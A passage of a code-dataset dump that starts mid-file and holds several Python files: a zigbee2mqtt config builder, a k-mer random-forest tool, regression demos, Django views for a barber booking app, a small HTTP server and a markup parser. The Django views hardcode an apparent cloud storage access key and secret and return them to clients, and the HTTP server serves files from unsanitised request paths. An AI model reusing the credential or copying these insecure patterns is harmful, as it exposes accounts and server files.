Only return false if the option is\n        # explicitly set to false\n        overwrite = self.options.get(\"overwrite\", None)\n        if overwrite is None: # not set, return True\n            return True\n        else:\n            # return False only if overwrite is set to False\n            return True if overwrite is True else False\n\n    def _config_name(self, name, alt=None):\n        if alt is None:\n            return name\n        else:\n            return alt\n\n\ndef main(options_path, data_path):\n\n    config = dict()\n    config_path = Path(data_path).joinpath('configuration.yaml')\n    if config_path.is_file(): # check if config file exists in data path\n        # TODO: Change this to accommodate overwrite option\n        print(\"[Info] Configuration file found: {}\".format(config_path))\n        with open(config_path) as f:\n            config = yaml.safe_load(f)\n    else: # make sure the data_path folder exists; if not, create it\n        if not Path(data_path).is_dir():\n            Path(data_path).mkdir()\n\n    with open(options_path) as f:\n        options = json.load(f)\n\n    cfg = ConfigBuilder(config, options)\n\n    if not cfg.overwrite:\n        print(\n            \"[Info] overwrite is disabled, will not overwrite options defined in {}\"\n            .format(config_path))\n\n    cfg.set_option('homeassistant')\n    cfg.set_option('permit_join')\n\n    cfg.set_option(\n        'mqtt_base_topic', category='mqtt', alt_config_name='base_topic')\n    cfg.set_option('mqtt_server', category='mqtt', alt_config_name='server')\n    cfg.set_option(\n        'mqtt_client_id', category='mqtt', alt_config_name='client_id')\n    cfg.set_option('include_device_information', category='mqtt')\n    cfg.set_option('reject_unauthorized', category='mqtt')\n\n    if options.get(\"mqtt_user\", None) or options.get(\"mqtt_pass\", None):\n        cfg.set_option('mqtt_user', category='mqtt', alt_config_name='user')\n        cfg.set_option(\n            'mqtt_pass', category='mqtt', alt_config_name='password')\n\n    cfg.set_option('serial_port', category='serial', alt_config_name='port')\n    cfg.set_option('disable_led', category='serial')\n\n    cfg.set_option('cache_state', category='advanced')\n\n    cfg.set_log_dir(data_path)\n\n    cfg.set_option('log_level', category='advanced')\n    cfg.set_option('rtscts', category='advanced')\n\n    cfg.set_option('soft_reset_timeout', category='advanced')\n\n    cfg.set_option('pan_id', category='advanced')\n    cfg.set_option('channel', category='advanced')\n\n    cfg.set_option('report', category='advanced')\n\n    cfg.set_option('availability_timeout', category='advanced')\n    cfg.set_option('last_seen', category='advanced')\n    cfg.set_option('elapsed', category='advanced')\n\n    # set device-specific settings. skips if empty list\n    if options.get(\"devices\", None):\n        cfg.set_devices_config(options.get(\"devices\"))\n    # set network key. 
skips if empty list\n if options.get(\"network_key\", None):\n cfg.set_option('network_key', category='advanced')\n\n cfg.dump(config_path)\n print('[Info] Configuration written to {}'.format(config_path))\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description='Construct an appropriate yaml configuration file.')\n parser.add_argument('options_path', type=str)\n parser.add_argument('data_path', type=str)\n parser.set_defaults(mqtt_user=None, mqtt_pass=None)\n args = parser.parse_args()\n main(args.options_path, args.data_path)\n","sub_path":"zigbee2mqtt/set_config.py","file_name":"set_config.py","file_ext":"py","file_size_in_byte":5884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"50065408","text":"'''\nThe main bits of dingo\n'''\n\n\n# system imports\nimport click\nimport os\nimport sys\n\n# local imports\nfrom jellyfish import JellyFish\nimport input_reader\nimport random_forest\n\n@click.command()\n@click.option(\"-k\", \"--ksize\", help = \"Kmer size to search for.\", default = 31, show_default = True)\n@click.option(\"-a\", \"--hashsize\", help = \"Hash size\", default = '5M', show_default = True)\n@click.option(\"--min_number\", help = \"Minimum number of kmer observations to count.\", default = 10, show_default = True)\n@click.option(\"--sreads\", help = \"Number of files to read simultaneously by jellyfish\", default = 2, show_default = True)\n@click.option(\"--nbytes\", help = \"Size of the number used for counting kmers\", default = 1, show_default = True)\n@click.option(\"-s\", \"--single_end\", is_flag = True, default = False, help = \"Data is single end\")\n@click.option(\"-f\", \"--force\", is_flag = True, default = False, help = \"Write over previous analysis\")\n@click.option(\"-o\", \"--outdir\", help = \"Output folder\")\n@click.option(\"-i\", \"--input_file\", help = \"Input file.\")\n@click.option(\"--kmer_fa\", help = \"A FASTA of kmers to count\", default = 'allcount.fa')\n@click.option(\"-t\", \"--threads\", help = \"Number of threads to run Jellyfish\", default = 16, show_default = True)\n@click.option(\"-p\",\"pickled_matrix\", help = \"Use a pickeled matrix\", default = \".kmer_table.pickle\", show_default = True)\n### random forest options\n@click.option(\"-n\", \"--n_trees\", help = \"Number of trees to grow\", default = 10, show_default = True)\n@click.option(\"-c\", \"--criterion\", help = 'Criterion to decide on optimal split ', default = \"entropy\", show_default = True)\n@click.option(\"-m\", \"--max_features\", help = \"Maximum number of features to consider for each tree\", default = \"sqrt\", show_default = True)\ndef main(input_file, ksize, hashsize, min_number, sreads, nbytes, single_end, force, outdir, threads, n_trees, criterion, max_features, kmer_fa, pickled_matrix):\n # check that necessary software exists, otherwise quit\n jf = JellyFish()\n jf.exists()\n\n # do some parameter checking\n max_features = random_forest.test_max_features(max_features)\n\n # check that outdir already exists, if NOT force, then quit\n\n # load input file --- check that paths exist otherwise quit\n data = input_reader.read(input_file)\n\n # create response variable\n y = [s[1] for s in data]\n\n # create output folder structure --- if can't write quit\n\n # run jellyfish to identify all the kmers\n # only run it if necessary\n if (os.path.exists(pickled_matrix) and not force):\n print(\"Found a pickled kmer matrix, going to use it...\")\n X,kmers = jf.load_kmertable(pickle_file = 
pickled_matrix)\n    else:\n        if (kmer_fa is None or not os.path.isfile(kmer_fa)):\n            jf.count_all_mers(data, ksize, hashsize, threads = threads, min_number = min_number, simult_read = sreads, n_bytes = nbytes)\n        else:\n            print(\"Found {}, so skipping counting kmers across all samples\" .format(kmer_fa), file = sys.stderr)\n        # run jellyfish to count kmers in individual isolates\n        jf.count_ind_mers(data, ksize, hashsize, threads = threads, min_number = min_number, simult_read = sreads, n_bytes = nbytes)\n        # merge individual jellyfish results to generate our input matrix\n        print(\"Generating kmer table...\", file = sys.stderr)\n        X,kmers = jf.join_counts(data)\n    print(\"Learning about the kmers...\", file = sys.stderr)\n    # run random forests to learn something\n    learn = random_forest.learn(X = X, y = y, n_trees = n_trees, criterion = criterion, max_features = max_features)\n    print(\"Computing importance of kmers...\", file = sys.stderr)\n    kmer_imp = random_forest.importance(learn, kmers)\n    print(\"Making predictions...\", file = sys.stderr)\n    print(learn.predict(X), file = sys.stderr)\n    #print(learn.predict_log_proba(X), file = sys.stderr)\n    print(kmer_imp.head(), file = sys.stderr)\n    kmer_imp.to_csv(\"junk.csv\")\n    pass\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"dingo/dingo.py","file_name":"dingo.py","file_ext":"py","file_size_in_byte":4029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"280173308","text":"#regression demo code\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef gradient_decent(_x_data, _y_data, _b, _w, _iteration, _lr):\n    \"\"\"\n    Gradient Descent\n    :param _x_data:\n    :param _y_data:\n    :param _b:\n    :param _w:\n    :param _iteration:\n    :param _lr:\n    :return:\n    \"\"\"\n    _b_history = [_b]\n    _w_history = [_w]\n\n    for _i in range(_iteration):\n        b_grad = 0.0\n        w_grad = 0.0\n\n        for _n in range(len(x_data)):\n            b_grad = b_grad - 2.0 * (y_data[_n] - _b - _w * _x_data[_n]) * 1.0\n            w_grad = w_grad - 2.0 * (y_data[_n] - _b - _w * _x_data[_n]) * _x_data[_n]\n\n        _b = _b - _lr * b_grad\n        _w = _w - _lr * w_grad\n\n        _b_history.append(_b)\n        _w_history.append(_w)\n    return _b_history, _w_history\n\n\ndef adagrad(_x_data, _y_data, _b, _w, _iteration, _lr):\n    \"\"\"\n    Adagrad: auto adapt the learning rate.\n    :param _x_data:\n    :param _y_data:\n    :param _b:\n    :param _w:\n    :param _iteration:\n    :param _lr:\n    :return:\n    \"\"\"\n    _b_history = [_b]\n    _w_history = [_w]\n    lr_b = 0\n    lr_w = 0\n\n    for _i in range(_iteration):\n        b_grad = 0.0\n        w_grad = 0.0\n\n        for _n in range(len(x_data)):\n            b_grad = b_grad - 2.0 * (y_data[_n] - _b - _w * _x_data[_n]) * 1.0\n            w_grad = w_grad - 2.0 * (y_data[_n] - _b - _w * _x_data[_n]) * _x_data[_n]\n\n        lr_b = lr_b + b_grad ** 2\n        lr_w = lr_w + w_grad ** 2\n        _b = _b - _lr / np.sqrt(lr_b) * b_grad\n        _w = _w - _lr / np.sqrt(lr_w) * w_grad\n\n        _b_history.append(_b)\n        _w_history.append(_w)\n    return _b_history, _w_history\n\n\ndef plot_result(_b_history, _w_history):\n    \"\"\"\n    Plot Result\n    :param _b_history:\n    :param _w_history:\n    :return:\n    \"\"\"\n    plt.contourf(x, y, z, 50, alpha=0.5, cmap=plt.get_cmap('jet'))\n    plt.plot([-188.4], [2.67], 'x', ms=12, markeredgewidth=3, color='orange')\n    plt.plot(_b_history, _w_history, 'o-', ms=3, lw=1.5, color='black')\n    plt.xlim(-200, -100)\n    plt.ylim(-5, 5)\n    plt.xlabel(r'$b$', fontsize=16)\n    plt.ylabel(r'$w$', fontsize=16)\n    plt.show()\n\n\nif __name__ == '__main__':\n    x_data = [338., 333., 328., 207., 226., 25., 179., 60., 208., 606.]\n    y_data = [640., 633., 619., 393., 
428., 27., 193., 66., 226., 1591.]\n\n x = np.arange(-200, -100, 1) # bias\n y = np.arange(-5, 5, 0.1) # weight\n z = np.zeros((len(x), len(y)))\n X, Y = np.meshgrid(x, y)\n\n for i in range(len(x)):\n for j in range(len(y)):\n b = x[i]\n w = y[j]\n z[j][i] = 0\n\n for n in range(len(x_data)):\n z[j][i] = z[j][i] + (y_data[n] - b - w * x_data[n]) ** 2\n\n z[j][i] = z[j][i] / len(x_data)\n\n b = -120\n w = -4\n lr = 1\n iteration = 100000\n\n # b_history, w_history = gradient_decent(x_data, y_data, b, w, iteration, lr)\n b_history, w_history = adagrad(x_data, y_data, b, w, iteration, lr)\n\n plot_result(b_history, w_history)\n","sub_path":"course_gd.py","file_name":"course_gd.py","file_ext":"py","file_size_in_byte":2973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"75017773","text":"from .test_client import TestClient\nimport numpy as np\nfrom multiprocessing import Process,Lock\nimport pickle\n\nmutex = Lock()\n\nclass MotionData(object):\n\n\n def __init__(self, num_length):\n self.test_client = TestClient()\n #self.data_array = np.zeros(num_length)\n #self.data_array = np.zeros(num_length)\n self.data_array = [None] * num_length\n self.num_length = num_length\n \n \n def receive_data(self, data):\n #print( \"Received data from client\", data)\n rec_num = data\n\n #self.data_array[2:] = self.data_array[1:]\n \n #make a running buffer\n with mutex:\n self.data_array.insert(0,rec_num)\n self.data_array.pop()\n \n #save data to a \n \n\n def start(self):\n self.test_client.dataListener = self.receive_data\n self.test_client.run()\n print('Start the interface thread')\n \n def stop(self):\n pass\n \n def get(self):\n current_value = None\n with mutex:\n current_value = self.data_array[0]\n #return the latest saved data\n return current_value","sub_path":"riglib/multithread_test/test_BMI3D_interface.py","file_name":"test_BMI3D_interface.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"416025710","text":"from robust.exception import *\nfrom django.http import HttpResponse\nfrom customer.customers import CustomersManager, CustomerProxy\nfrom barber.barbers import BarbersManager, CommentManager\nfrom appointment.appt import *\nfrom utilities.common import encode, current_time\n\n\ndef quick_appt(request):\n result = {'code': 100, 'log': 'Order has been sent to the barber end.'}\n re_data = None\n try:\n #result = {'code': 100, 'log': 'Order has been sent to the barber end.'}\n data = Checker.request(request, ['phone', 'name', 'longitude', 'latitude', 'sex'])\n try:\n _ = CustomerProxy(data['phone'])\n except CustomerDoesNotExistError:\n CustomersManager.add_customer(phone=data['phone'], name=data['name'], sex=data['sex'])\n order = OrdersManager.add_order(cus_phone=data['phone'])\n barbers, dis = BarbersManager.get_near_barber(longitude=float(data['longitude']),\n latitude=float(data['latitude']), range_=1500)\n push_order_to_barber_test(order=order, barbers=barbers, dis_list=dis)\n\n except JianyueError as e:\n result = e.info\n finally:\n result['data'] = re_data\n return HttpResponse(encode(result))\n\n\ndef normal_appt(request):\n result = {'code': 100, 'log': 'Barber list has been returned.'}\n re_data = None\n try:\n data = Checker.request(request, ['longitude', 'latitude', 'date'])\n barbers, dis_list = BarbersManager.get_near_barber(longitude=float(data['longitude']),\n latitude=float(data['latitude']), range_=1500)\n barbers = 
process_time(barbers=barbers, date=data['date'])\n        l = len(barbers)\n        for i in range(0, l):\n            barbers[i]['distance'] = dis_list[i]\n        barbers.sort(key=lambda d: d['distance'])\n        if not barbers:\n            raise NoBarberHasRegister\n        re_data = barbers\n    except JianyueError as e:\n        result = e.info\n    finally:\n        result['data'] = re_data\n    return HttpResponse(encode(result))\n\n\ndef submit_order(request):\n    result = {'code': 100, 'log': 'Has notified the barber.'}\n    re_data = None\n    try:\n        data = Checker.request(request, ['barphone', 'cusphone', 'cusname', 'sex',\n                                         'time', 'distance', 'hairstyle', 'remark'])\n        #try:\n        #    _ = CustomerProxy(data['cusphone'])\n        #except CustomerDoesNotExistError:\n        CustomersManager.add_customer(phone=data['cusphone'], name=data['cusname'], sex=data['sex'])\n\n        #time_conflict(phone=data['cusphone'], time_=data['time']) # ??\n        order_clash(bar_phone=data['barphone'], time_=data['time'])\n        time_ = calculate_order_time(hairstyle=data['hairstyle'], time_=data['time'])\n\n        order = OrdersManager.add_order(cus_phone=data['cusphone'], bar_phone=data['barphone'],\n                                        time_=time_, hairstyle=data['hairstyle'],\n                                        remark=data['remark'], accepted=True).get_dict()\n        order.pop('accepted')\n        push_msg(alias=order['barphone'], msg=order)\n    except JianyueError as e:\n        result = e.info\n    finally:\n        result['data'] = re_data\n    return HttpResponse(encode(result))\n\n\ndef is_register(request):\n    result = {'code': 100, 'log': \"User exists, returning user's info\"}\n    re_data = None\n    try:\n        data = Checker.request(request, ['phone'])\n        customer = CustomerProxy(data['phone'])\n        re_data = customer.get_dict()# also returns the avatar\n    except JianyueError as e:\n        result = e.info\n    finally:\n        result['data'] = re_data\n    return HttpResponse(encode(result))\n\n\ndef get_barber(request):\n    result = {'code': 100, 'log': 'Barber info has been returned.'}\n    re_data = None\n    try:\n        data = Checker.request(request, ['phone', 'date'])\n        #re_data = process_time(barbers=[BarberProxy(data['phone'])], date=data['date'])[0]\n        #this get_barber looks wrong: it should return the barber for the time slot the user requested\n        re_data = process_time(barbers=[BarberProxy(data['phone'])], date=data['date'])[0]\n    except JianyueError as e:\n        result = e.info\n    finally:\n        result['data'] = re_data\n    return HttpResponse(encode(result))\n\n\ndef update_name(request):\n    result = {'code': 100, 'log': \"Customer's name updated successfully!\"}\n    re_data = None\n    try:\n        data = Checker.request(request, ['phone', 'name'])\n        CustomerProxy(phone=data['phone']).name = data['name']\n    except JianyueError as e:\n        result = e.info\n    finally:\n        result['data'] = re_data\n    return HttpResponse(encode(result))\n\n\ndef update_sex(request):\n    result = {'code': 100, 'log': \"Customer's sex updated successfully!\"}\n    re_data = None\n    try:\n        data = Checker.request(request, ['phone', 'sex'])\n        CustomerProxy(phone=data['phone']).sex = data['sex']\n    except JianyueError as e:\n        result = e.info\n    finally:\n        result['data'] = re_data\n    return HttpResponse(encode(result))\n\n\ndef update_profile(request):\n    result = {'code': 100, 'log': 'Info needed for the file upload has been returned'}\n    re_data = None\n    try:\n        data = Checker.request(request, ['phone'])\n        customer = CustomerProxy(phone=data['phone'])\n        customer.profile = 'profile/customer/' + customer.phone + '.png'\n        re_data = {'key': customer.profile,\n                   'bucket_name': 'jianyue-img',\n                   'access_key_id': 'DS1sGprn39SnhFDV',\n                   'access_key_secret': 'dFmlLMHapOfyUKTDeeUFCp7M64U1aD',\n                   }\n    except JianyueError as e:\n        result = e.info\n    finally:\n        result['data'] = re_data\n    return HttpResponse(encode(result))\n    #return 
HttpResponse(encode(result))\n\n\ndef update_phone(request):\n    result = {'code': 100, 'log': \"Customer's phone has been updated successfully!\"}\n    re_data = None\n    try:\n        data = Checker.request(request, ['phone', 'phone_u'])\n        CustomerProxy(phone=data['phone']).phone = data['phone_u']\n    except JianyueError as e:\n        result = e.info\n    finally:\n        result['data'] = re_data\n    return HttpResponse(encode(result))\n    pass\n#comment barber\ndef comment(request):\n    result = {'code': 100, 'log': 'Comment submitted successfully'}\n    re_data = None\n    #take the customer info out of the request\n    #get the comment content\n    #get the rating\n    #get the current time\n    #add the info to the database\n    try:\n        data = Checker.request(request, ['cus_phone', 'bar_phone', 'content', 'rank'])\n        CommentManager.add_comment(content=data['content'],\n                                   cus_phone=data['cus_phone'],\n                                   bar_phone=data['bar_phone'],\n                                   rank=data['rank'],\n                                   time=current_time())\n    except JianyueError as e:\n        result = e.info\n    finally:\n        result['data'] = re_data\n        return HttpResponse(encode(result))","sub_path":"customer/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"121903546","text":"import http.server\nimport json\nfrom python.RequestHandler import Handler\nimport mimetypes\n\nhandler = Handler()\n\nmimetypes.init()\nmimetypes.add_type('text/javascript', '.js', strict=True)\n\n\ndef __init__():\n    return\n\n\nclass ApplicationServer (http.server.SimpleHTTPRequestHandler):\n    def do_POST(self):\n        uri = self.requestline.split(' ')[1]\n        if uri != '/api':\n            print('Wrong API uri: {0}'.format(uri))\n            self.send_response(200)\n            self.send_header(\"Content-Type\", \"application/json\")\n            self.end_headers()\n            self.wfile.write(bytes(json.dumps({\n                'ok': False,\n                'description': 'Wrong API uri'\n            }), 'utf-8'))\n            return\n\n        bodyLength = int(self.headers.get('content-length', 0))\n        body = self.rfile.read(bodyLength).decode('utf-8')\n        parsedBody = []\n        try:\n            parsedBody = json.loads(body)\n        except:\n            self.send_response(400)\n            self.end_headers()\n            self.wfile.write(b'Error 400: Not a JSON request')\n\n        resp = handler.handle_request(parsedBody)\n\n        #print('Sending response: ')\n        self.send_response(200)\n        self.send_header(\"Content-Type\", \"application/json\")\n        self.end_headers()\n        self.wfile.write(bytes(json.dumps(resp), 'utf-8'))\n\n    def do_GET(self):\n        filepath = ''\n        try:\n            if self.path in (\"\", \"/\"):\n                filepath = \"index.html\"\n            else:\n                filepath = self.path.lstrip(\"/\")\n\n            f = open('html/%s' % filepath, \"rb\")\n\n        except IOError:\n            self.send_error(404, 'File Not Found: %s ' % filepath)\n\n        else:\n            self.send_response(200)\n            #this part handles the mimetypes for you.\n            mimetype, _ = mimetypes.guess_type(filepath)\n            #print(mimetype)\n            self.send_header('Content-type', mimetype)\n            self.end_headers()\n            for s in f:\n                self.wfile.write(s)\n\n\nif __name__ == '__main__':\n    server = http.server.HTTPServer\n    httpd = server(('', 8082), ApplicationServer)\n    try:\n        print('Serving from now. 
Please, open \"http://localhost:8082\" in any internet browser.')\n        httpd.serve_forever()\n    except KeyboardInterrupt:\n        pass\n    httpd.server_close()\n","sub_path":"ApplicationServer.py","file_name":"ApplicationServer.py","file_ext":"py","file_size_in_byte":2348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"70938539","text":"import random\nRange = 100\nLength = 5\nlist = random.sample(range(Range),Length) \n#randomly sample a slice of the given length from the specified range\nprint('before sort:',list)\nfor i in range(1,Length): #the first element is assumed to be in the sorted part already; insert starting from the later ones \n    for j in range(i,0,-1): \n\t#walk backwards comparing and swapping positions to perform the insertion \n        if list[j] < list[j-1]: \n            list[j],list[j-1] = list[j-1],list[j]\nprint('after sort:',list)\n\n","sub_path":"notes/VC/排序算法/insert/insert.py","file_name":"insert.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"496665629","text":"import copy\n\nfrom .caExceptions import CodeParserException\n\ncontextChar = '@'\ncontentChar = '$'\nmetaChar = '^'\n\ndef lineAndIndexCounter(targetString):\n    sIter = enumerate(targetString.__iter__())\n    lineCount = 1\n    while True:\n        i, char = next(sIter)\n        if char == '\\n':\n            lineCount += 1\n        yield lineCount, i, char\n\nclass parseTree(object):\n    def __init__(self, targetString, targetPath = None):\n        if targetPath is not None:\n            self.files = [targetPath]\n        else:\n            self.files = []\n        sIter = lineAndIndexCounter(targetString)\n        self.topNode = Node(sIter, 0, -1, '', targetPath)\n        self.tagSegments = self.topNode.tagSections\n        tmpTagDict = {}\n        for seg in self.tagSegments:\n            try:\n                tmpTagDict[seg.tag].append(seg)\n            except KeyError:\n                tmpTagDict[seg.tag] = [seg]\n        self._tags = None\n\n    def getTags(self):\n        if self._tags is None:\n            tmpTagDict = {}\n            for seg in self.tagSegments:\n                try:\n                    tmpTagDict[seg.tag].append(seg)\n                except KeyError:\n                    tmpTagDict[seg.tag] = [seg]\n            self._tags = {tag : makeCode(tag, sections = segs) for tag, segs in tmpTagDict.items()}\n        return self._tags\n\n    def setTags(self, value):\n        self._tags = value\n\n    def delTags(self):\n        del self._tags\n\n    tags = property(getTags, setTags, delTags, \"The tags of the tree\")\n\n    def __iadd__(self, other):\n        self.topNode += other.topNode\n        newTags = {}\n        for tagString, tagObj in self.tags.items():\n            if tagString in other.tags:\n                newTags[tagString] = tagObj + other.tags[tagString]\n            else:\n                newTags[tagString] = tagObj\n        for tagString, tagObj in ((s, t) for s, t in other.tags.items() if s not in newTags):\n            newTags[tagString] = tagObj\n        self.tags = newTags\n        self.files += other.files\n        return self\n\nclass Node(object):\n    def __init__(self, sIter, startLine, startIndex, startCode, filePath):\n        if startCode == '[':\n            self.code = True\n            self._raw = ''\n        else:\n            self.code = False\n            self._raw = startCode\n        self.tokens = None\n        self.contents = [] #Nice values\n        self._contents = [] #Raw values\n        self.line = startLine\n        self.index = startIndex\n        self.file = filePath\n\n        self._children = None\n        self._containedSections = None\n        self._tagSections = None\n        self._codes = None\n\n        stopIter = False\n        inBraces = False\n        currentString = ''\n        currentIndex = 0\n        currentLine = 1\n        freshString = True\n\n        while not stopIter:\n            try:\n                line, i, char = next(sIter)\n                if not inBraces:\n                    self._raw += char\n                if freshString:\n                    currentLine, currentIndex, currentString = line, i, ''\n                    freshString = False\n            except StopIteration:\n                if inBraces:\n                    currentString += '](' + self.tokens\n                    self._contents.append((currentLine, currentIndex, 
currentString))\n                    self.code = False\n                stopIter = True\n            else:\n                if inBraces:\n                    if char == ')':\n                        stopIter = True\n                    else:\n                        self.tokens += char\n                elif char == '[':\n                    self._contents.append((currentLine, currentIndex, currentString))\n                    self._raw = self._raw[:-1]\n                    innerCode = Node(sIter, line, i, char, self.file)\n                    self._raw += innerCode.raw\n                    self._contents.append(innerCode)\n                    freshString = True\n                elif char == ']' and self.code:\n                    try:\n                        line, i, char = next(sIter)\n                        self._raw += char\n                    except StopIteration:\n                        stopIter = True\n                    else:\n                        if char == '(':\n                            self.tokens = ''\n                            inBraces = True\n                            self._contents.append((currentLine, currentIndex, currentString))\n                            self._raw = self._raw[:-2]\n                        elif char == '[':\n                            self._contents.append((currentLine, currentIndex, currentString))\n                            innerCode = Node(sIter, line, i, char, self.file)\n                            self._raw += innerCode.raw\n                            self._contents.append(innerCode)\n                            self.code = False\n                            stopIter = True\n                        else:\n                            currentString += ']' + char\n                            self._contents.append((currentLine, currentIndex, currentString))\n                            stopIter = True\n                            self.code = False\n                else:\n                    currentString += char\n\n        for val in self._contents:\n            if isinstance(val, Node):\n                self.contents.append(val)\n            elif isinstance(val, tuple):\n                self.contents.append(val[2])\n            else:\n                raise CodeParserException(\"Unexpected object: {} in _contents\".format(val))\n\n    def __add__(self, other):\n        tmpSelf = copy.copy(self)\n        tmpSelf._contents.append(other._contents)\n        tmpSelf.contents.append(other.contents)\n        #reset the memoizations\n        tmpSelf._children = None\n        tmpSelf._containedSections = None\n        tmpSelf._tagSections = None\n        tmpSelf._codes = None\n        return tmpSelf\n\n    def __iadd__(self, other):\n        self._contents.append(other._contents)\n        self.contents.append(other.contents)\n        #reset the memoizations\n        self._children = None\n        self._containedSections = None\n        self._tagSections = None\n        self._codes = None\n        return self\n\n    @property\n    def raw(self):\n        #TODO Consider how to handle this\n        return self._raw\n\n    @property\n    def children(self):\n        if self._children is None:\n            children = []\n            for val in self._contents:\n                if isinstance(val, tuple):\n                    pass\n                elif isinstance(val, Node):\n                    children.append(val)\n                else:\n                    raise CodeParserException(\"Node {} contains a non-Node, non-string object: {}\".format(self, val))\n            self._children = children\n        return self._children\n\n    @property\n    def containedSections(self):\n        if self._containedSections is None:\n            self._containedSections = self.codes\n            for child in self.children:\n                self._containedSections += child.codes\n        return self._containedSections\n\n    @property\n    def tagSections(self):\n        if self._tagSections is None:\n            self._tagSections = self.codes\n            for c in self.children:\n                self._tagSections += c.tagSections\n        return self._tagSections\n\n    @property\n    def codes(self):\n        def readCodes(codeStr):\n            codes = codeStr.split(' ')\n            retCodes = []\n            for code in codes:\n                if len(code) > 1 and code[0] in codeSectionTypes:\n                    retCodes.append((code[0], code))\n            return retCodes\n\n        if self._codes is None:\n            self._codes = []\n            if self.code:\n                tagStrings = readCodes(self.tokens)\n                for codeChar, code in tagStrings:\n                    self._codes.append(codeSectionTypes[codeChar](self._contents, code, self.line, self.index, self.raw, self.file))\n        return self._codes\n\n    def __repr__(self):\n        if self.code:\n            s = \"< Node [{}]({}) >\".format(len(self._raw), self.tokens)\n        else:\n            s = \"< Node [{}] >\".format(len(self._raw))\n        return s\n\nclass CodeSection(object):\n    def __init__(self, contents, tag, startLine, startIndex, startRaw, 
filePath):\n        self.contents = contents\n        self.tag = tag\n        self.line = startLine\n        self.index = startIndex\n        self.file = filePath\n        self._raw = startRaw\n        self._children = None\n\n    def __repr__(self):\n        s = \"< CodeSection [{}]({}) >\".format(len(self._raw), self.tag)\n        return s\n\n    def __str__(self):\n        s = \"From {}\\nLine {}\\tCharacter Number {}\\tLength {}\\n{}\".format(self.file, self.line, self.index + 1, len(self), self.raw)\n        return s\n\n    def __hash__(self):\n        return hash(self.raw + self.tag + str(self.index))\n\n    def __len__(self):\n        return len(self.raw)\n\n    def __contains__(self, tag):\n        for c in self.children:\n            if c.tag == tag:\n                return True\n        return False\n\n    def __getitem__(self, tag):\n        retTags = []\n        for c in self.children:\n            for sec in c.codes:\n                if sec.tag == tag:\n                    retTags.append(sec)\n        return retTags\n\n    @property\n    def raw(self):\n        return self._raw\n\n    @property\n    def children(self):\n        if self._children is None:\n            children = []\n            for val in self.contents:\n                if isinstance(val, tuple):\n                    pass\n                elif isinstance(val, Node):\n                    children.append(val)\n                else:\n                    raise CodeParserException(\"Node {} contains a non-Node, non-string object: {}\".format(self, val))\n            self._children = children\n        return self._children\n\nclass ContextCodeSection(CodeSection):\n    pass\n\nclass ContentCodeSection(CodeSection):\n    pass\n\nclass MetaCodeSection(CodeSection):\n    pass\n\ncodeSectionTypes = {\n    contextChar : ContextCodeSection,\n    contentChar : ContentCodeSection,\n    metaChar : MetaCodeSection,\n}\n\nclass Tag(object):\n    def __init__(self, sections, tag):\n        for s in sections:\n            if s.tag != tag:\n                raise CodeParserException(\"Tag objects can only be made from CodeSections with the same tag. A tag of {} was found when {} was expected\".format(s.tag, tag))\n        self.sections = sections\n        self._containedTags = None\n        self._containedSections = None\n        self._raw = None\n        self.tag = tag\n        self.description = None\n        self.extraInfo = None\n        self.unDocumented = True\n\n    def __add__(self, other):\n        if self.tag != other.tag:\n            raise CodeParserException(\"Tags can only be added together if they have the same tag string, {} cannot be added to {}\".format(self.tag, other.tag))\n        return Tag(self.sections + other.sections, self.tag)\n\n    def __len__(self):\n        return len(self.sections)\n\n    def __getitem__(self, tag):\n        retSections = []\n        for sec in self.sections:\n            retSections += sec[tag]\n        return retSections\n\n    @property\n    def raw(self):\n        if self._raw is None:\n            self._raw = []\n            for sec in self.sections:\n                self._raw.append(sec.raw)\n        return self._raw\n\n    @property\n    def containedSections(self):\n        if self._containedSections is None:\n            self._containedSections = []\n            for sec in self.sections:\n                for seg in [node.containedSections for node in sec.children]:\n                    self._containedSections += seg\n        return self._containedSections\n\n    @property\n    def containedTags(self):\n        if self._containedTags is None:\n            self._containedTags = []\n            for sec in self.containedSections:\n                if sec.tag not in self._containedTags:\n                    self._containedTags.append(sec.tag)\n        return self._containedTags\n\n    def __repr__(self):\n        if self.unDocumented:\n            s = \"< {} {} [unDocumented] >\".format(type(self).__qualname__, self.tag)\n        elif self.description:\n            s = \"< {} {} [{}] >\".format(type(self).__qualname__, self.tag, self.description)\n        else:\n            s = \"< {} {} [No Description] >\".format(type(self).__qualname__, self.tag)\n        return s\n\n    def __str__(self):\n        s = \"{}\\t{}\\tcount {}\\t: \".format(type(self).__qualname__, self.tag, len(self))\n        if self.unDocumented:\n            s 
+= \"unDocumented\"\n        elif self.description:\n            s += \"{}\".format(self.description)\n        else:\n            s += \"No Description\"\n        return s\n\n    def addDocs(self, dataDict):\n        if 'description' in dataDict:\n            self.description = dataDict.pop('description')\n        if len(dataDict) > 0:\n            self.extraInfo = dataDict\n        self.unDocumented = False\n\nclass ContextCode(Tag):\n    pass\n\nclass ContentCode(Tag):\n    pass\n\nclass MetaCode(Tag):\n    pass\n\ncodeTypes = {\n    contextChar : ContextCode,\n    contentChar : ContentCode,\n    metaChar : MetaCode,\n}\n\ndef makeCode(tagString, sections = None, dataDict = None):\n    if sections is None:\n        sections = []\n    try:\n        tag = codeTypes[tagString[0]](sections, tagString)\n    except KeyError:\n        raise KeyError(\"{} is not the beginning of a code.\".format(tagString[0]))\n    if dataDict is not None:\n        tag.addDocs(dataDict)\n    return tag\n","sub_path":"caMarkdown/codes.py","file_name":"codes.py","file_ext":"py","file_size_in_byte":13497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
